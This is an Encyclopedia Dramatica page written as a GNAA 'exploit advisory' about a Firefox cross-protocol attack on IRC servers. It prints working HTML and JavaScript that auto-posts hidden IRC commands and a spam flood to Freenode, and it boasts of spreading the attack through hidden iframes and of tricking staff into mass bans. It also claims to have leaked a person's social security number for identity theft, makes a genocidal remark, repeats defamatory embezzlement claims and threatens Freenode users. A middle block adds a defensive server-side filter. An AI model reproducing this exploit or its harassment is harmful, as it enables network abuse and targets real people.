    Firefox XPS IRC Attack

    From Encyclopedia Dramatica
    GOATSE SECURITY TEAM 0-DAY EXPLOIT ADVISORY
    irc.gnaa.eu #gnaa to discuss security consulting arrangements

    Since it's been copied to much less sweet websites (without credit or sourcing), it's time to write up a security advisory (I believe the publishing of infosec advisories is a first for Encyclopedia Dramatica, lulz) and let everybody know what's up. Firefox has a hole in its port blocking scheme that allows a clever troll to spam an unsuspecting IRC daemon with whatever he desires. The GNAA leveraged this vulnerability to bring complete ruin upon the Freenode IRC network.

    How it works

    A new implementation of cross-protocol scripting was used to automatically fill an HTTP form to send a POST to port 6667 and shove a bunch of IRC commands down the socket. Although Mozilla banned most of the fun ports years ago, 6667, the default port for IRC servers, wasn't on the list. In all likelihood, this is the first use of this attack in the wild, ever.

    This attack has a lot of implications outside of IRC. Think of all the other TCP ports that are in common use these days that aren't covered in Mozilla's banned list. Most protocols do not use a cookied handshake of any sort to initiate a connection. The sheer amount of potential that exists in turning a web browser into a device speaking an arbitrary protocol is huge. For example, SIP protocol can run on TCP these days. You can make someone's web browser interact with a SIP device. All sorts of potentially criminal and civil liability generating applications. Expect more of them to appear out of the GNAA labs in the future!

    Example source


    <form action="http://irc.freenode.net:6667/" method="post" enctype="text/plain"> 
    <textarea style="display:none" id="x" name="x"></textarea>
    <input type="submit" style="display:none;" />
    </form>
    <script type="text/javascript">
    function randomString(length) {
            var chars = "abcdefghiklmnopqrstuvwxyz";
            var randomstring = '';
            for (var i=0; i<length; i++) {
                    var rnum = Math.floor(Math.random() * chars.length);
                    randomstring += chars.substring(rnum,rnum+1);
            }
            return randomstring;
    }
    n=randomString(Math.floor(Math.random()*10+3));
    i=randomString(Math.floor(Math.random()*10+3));
    te=document.getElementById('x');
    te.value = '\nUSER '+i+' 8 * :'+n+'\nNICK '+n+'\nJOIN #freenode\n'+new Array(99).join('PRIVMSG #freenode :Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.gnaa.eu #gnaa ....... My name is '+n+', and I hope you have a nice day.\n');
    te.parentNode.submit()
    </script> 

    Browser rundown

    IRCD rundown

    • Efnet, no longer affected (took them about an hour to enact countermeasures)
    • Buttesnet, no longer affected (took them about 4 hours to enact countermeasures)
    • OFTC, no longer affected (took them about a day)
    • Freenode, over 1 month to enact countermeasures with a server upgrade from Hyperion to ircd-seven, after which they immediately got raped by GNAA. (LOL)
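
A server-side check for the cross-protocol connection described under "How it works", given here as an added example (it is not part of the original advisory and not the countermeasure any network listed above deployed): a browser-driven connection opens with an HTTP request line and headers before the injected IRC commands, so a listener can refuse any unregistered client whose input carries HTTP framing. The function name, method list, header pattern and sample inputs are assumptions constructed for this example.

```javascript
// Added example: pre-registration filter for an IRC listener (hypothetical names).
const HTTP_METHODS = new Set(["GET", "POST", "PUT", "HEAD", "OPTIONS", "DELETE"]);
const HTTP_REQUEST_LINE = /^([A-Z]+) \S+ HTTP\/\d(?:\.\d)?$/;
const HTTP_HEADER =
  /^(Host|User-Agent|Content-Type|Content-Length|Referer|Origin|Cookie|Accept[\w-]*):/i;

// Classify everything a client sent before it completed NICK/USER registration.
// Returns { verdict: "drop" | "allow", reason }.
function classifyPreRegistration(buffer) {
  const lines = buffer.split(/\r?\n/).map((l) => l.trim()).filter(Boolean);
  for (const line of lines) {
    const m = HTTP_REQUEST_LINE.exec(line);
    if (m && HTTP_METHODS.has(m[1])) {
      return { verdict: "drop", reason: "http-request-line" };
    }
    // Covers the case where the request line was consumed by an earlier read.
    if (HTTP_HEADER.test(line)) {
      return { verdict: "drop", reason: "http-header" };
    }
  }
  return { verdict: "allow", reason: "no-http-framing" };
}

// Constructed sample: what a text/plain form POST looks like on the wire.
const SAMPLE_BROWSER_POST =
  "POST / HTTP/1.1\r\n" +
  "Host: irc.example.net:6667\r\n" +
  "Content-Type: text/plain\r\n" +
  "Content-Length: 48\r\n" +
  "\r\n" +
  "x=\r\nUSER abc 8 * :def\r\nNICK def\r\n";

// Constructed sample: an ordinary IRC client registering.
const SAMPLE_IRC_CLIENT = "CAP LS 302\r\nNICK alice\r\nUSER alice 0 * :Alice\r\n";

// Constructed sample: headers only, request line already read elsewhere.
const SAMPLE_HEADER_FRAGMENT = "Content-Type: text/plain\r\nContent-Length: 48\r\n";

function runSamples() {
  return [SAMPLE_BROWSER_POST, SAMPLE_IRC_CLIENT, SAMPLE_HEADER_FRAGMENT].map(
    (s) => classifyPreRegistration(s)
  );
}

console.log(runSamples());
```

The check only applies to input received before registration completes, so it does not interfere with normal channel traffic from clients that are already registered.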


    Best things that were done to Freenode

    • Embedded exploit in hidden iframes in everyone's favorite shock site, leading to thousands of hosts joining network.
    • Messaged Freenode opers blog links with hidden iframes and watched as they all k-lined each other
    • Switched up the floods to CTCP and made users flood themselves off with CTCP replies over and over again until they were k-lined from servers with reconnect limits.
    • Flooded freenode with channel names full of legitimate users implying they were troll channels, making paranoid freenode ops ban their own legitimate users.
    • After seeing a Freenode staff member make a bot that automatically k-lined flooding users in a channel with wildcards, manually flooded the channel from a shell account and watched it ban an entire TLD, taking a gigantic swath of the network with it.
    • Made Freenode staff xenophobic and paranoid and watched them k-line anyone who dared ask for assistance or complain about the floods.
    • Making Freenode users self-propagate the link on third party blogging services with warnings to not click the link (we got huge referrals from Twitter, thanks dudes)

    You are mean. Why did you torture freenode so much?

    Freenode/PDPC is a fucking fraud. In the entire time it has existed, it has never released financial statements. Rob Levin used PDPC to embezzle hundreds of thousands of dollars which should have been given to open source development projects. He faked his death, and came back in this "christel" incarnation in Europe to continue embezzling from Freenode. It is all a big lie, and these people should be thrown into ovens. EFnet continuously hosts 100x the number of users that Freenode does without constant netsplits and incidents. OFTC does not sit there and continuously beg for money. Get off of Freenode. Go to somewhere that is ethical.

    Beyond that, the trolling scene has a lot invested in ruining Freenode. I posted Rob Levin's social security number, enabling the series of identity thefts and ruins that forced the man to fake his death. With Bantown, I watched Jmax sniff lilo's oper block password off the wire and absolutely wreck the network in it. I also watched Grog (of the GNAA at the time, until he was excommunicated by the former tyrant timecop) convince lilo that he was the founder of MySQL, get opered up, wreck the network. Then he convinced lilo that his daughter's computer was hacked, apologized, got his o:line back and wrecked the network again.

    In short, wrecking Freenode is a long and glorious troll tradition that stretches backwards for time immemorial. If you associate with Freenode, use Freenode, or support Freenode, you are a target. You are asking to be destroyed.

    Featured article March 7, 2010